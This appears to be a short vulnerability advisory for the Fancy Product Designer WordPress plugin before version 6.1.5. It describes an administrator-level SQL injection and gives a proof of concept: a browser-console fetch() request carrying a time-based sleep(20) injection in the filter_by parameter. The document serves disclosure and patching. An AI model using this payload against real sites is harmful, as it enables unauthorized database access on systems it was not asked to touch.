Fancy Product Designer < 6.1.5 - Admin+ SQL Injection

Description The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by adminstrators.

PoC

- Log in as an administrator, and visit /wp-admin/. - Add a Catalog Product in /wp-admin/admin.php?page=fancy_product_designer - Search for “fpd_dismiss_notification” in the page’s source, note down the associated nonce - Send the following fetch() command in your browser’s console, and replace $NONCE with the nonce: fetch('/wp-admin/admin-ajax.php?action=fpd_get_products&_ajax_nonce=$NONCE&filter;_by=ID%2c(select*from(select(sleep(20)))a)&sort;_by=ASC&page;=1&type;=catalog').then(x=>x.text()).then(x=>console.log(x)) Notice it takes approximately 20 seconds for the server to answer, confirming our injected SQL statements were executed.